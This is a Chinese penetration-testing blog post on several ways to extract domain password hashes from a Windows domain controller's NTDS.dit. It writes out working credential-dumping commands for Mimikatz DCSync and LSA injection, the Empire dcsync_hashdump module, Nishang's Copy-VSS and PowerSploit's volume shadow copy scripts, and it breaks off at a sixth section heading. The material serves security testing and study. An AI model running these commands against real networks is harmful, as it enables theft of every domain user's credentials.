• 欢迎访问挑战自我博客网站,安全研究,web渗透,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入挑战自我博客网站 网站主页

域控密码hash的多种获取方法研究

1、文章背景

域控密码hash的获取在渗透测试中是非常常见的,当我们已经获取了域管理员的权限,就可以提取所有域用户的密码hash散列,用于离线破解和分析。这些hash散列被存储在域控制器中的数据库文件 NTDS.DIT 中,并具有一些附加信息,如用户组和用户信息等。

NTDDS.DI文件是在操作系统中实时使用的,因此不能直接复制到另一个位置以提取信息。这个文件可以在如下路劲中找到:

C:\Windows\NTDS\NTDS.dit

有多种技术可用于提取该文件或存储在其中的信息,但是大多数技术使用如下方法中的一种:

1、Domain Controller Replication Services(域控制器复制服务)
2、Native Windows Binaries
3、WMI

2、利用Mimikatz来获取域控密码hash

Mimikatz有一个特性(DCSYNC),它利用目录复制服务(DRS)从NTDDS.DIT文件中检索hash密码散列。该技术消除了直接从域控制器进行认证的必要性,因为它可以在属于域的任何系统中执行,只要具备域控管理员权限即可(这句话我本地有测试过,最重要的意义就在于可以在任何一台域内主机中提取域控密码hash,非常赞)。该特性的基本用法如下:

lsadump::dcsync /domain:pentestlab.local /all /csv

域控密码hash的多种获取方法研究

通过使用用户参数指定域用户名,MIMIKATZ可以获取该特定用户的所有帐户信息,包括他的密码hash。

lsadump::dcsync /domain:pentestlab.local /user:test

域控密码hash的多种获取方法研究

或者我们可以在域控制器中直接执行MIMIKATZ,密码hash可以从LSAS.EXE进程中读取出来。

privilege::debug
lsadump::lsa /inject

域控密码hash的多种获取方法研究

这样就可以直接获取域用户的hash密码了

域控密码hash的多种获取方法研究

3、利用Empire来获取域控密码hash

PowerShell Empire在域渗透测试方面有它独有的优势,开源下载地址:

https://github.com/EmpireProject/Empire

它有两个模块,都是通过DCSync攻击技术来获取域hash的。这两个模块都需要以域管理员的权限执行,并且它们使用微软复制服务。这两个模块依赖于MIMIKATZ PowerShell脚本,通过它来执行与DCSync相关的MIMIKATZ命令。下面的这个模块将会提取域控hash,提取到的格式与Metasploit中hashdump命令输出的格式类似。

usemodule credentials/mimikatz/dcsync_hashdump

域控密码hash的多种获取方法研究

DCSync模块需要指定特定用户,然后才能提取相关帐户信息。

域控密码hash的多种获取方法研究

将获得以下信息:

域控密码hash的多种获取方法研究

4、利用Nishang来获取域控密码hash

Nishang是一个PowerShell 框架,它可以让渗透测试人员对系统进行攻击测试。下载地址如下链接:

https://github.com/samratashok/nishang

其中的Copy-VSS脚本可以自动提取所需文件:NTDS.DIT, SAM and SYSTEM。这些文件将被提取到当前的工作目录或其他指定的文件夹中。

Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\

域控密码hash的多种获取方法研究

这个脚本也可以在Meterpreter的session中执行

load powershell
powershell_import /root/Copy-VSS.ps1
powershell_execute Copy-VSS

域控密码hash的多种获取方法研究

它也可以在powershell的session中直接使用,一旦该脚本被导入,那么就会执行对应的命令。

Copy-VSS
Copy-VSS -DestinationDir C:\Ninja

域控密码hash的多种获取方法研究

5、利用PowerSploit来获取域控密码hash

PowerSploit包含一个PowerShell脚本,它利用卷影复制服务创建一个新的卷,可以用于提取文件。

Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy 

域控密码hash的多种获取方法研究

这个脚本也可以在Meterpreter的session中执行

powershell_shell
New-VolumeShadowCopy -Volume C:\
Get-VOlumeShadowCopy

域控密码hash的多种获取方法研究

然后,可以通过copy命令将文件从新卷复制到目的地路径。

6、利用Invoke-DCSync来获取域控密码hash


挑战自我博客, 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明域控密码hash的多种获取方法研究
喜欢 (7)
支付宝[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址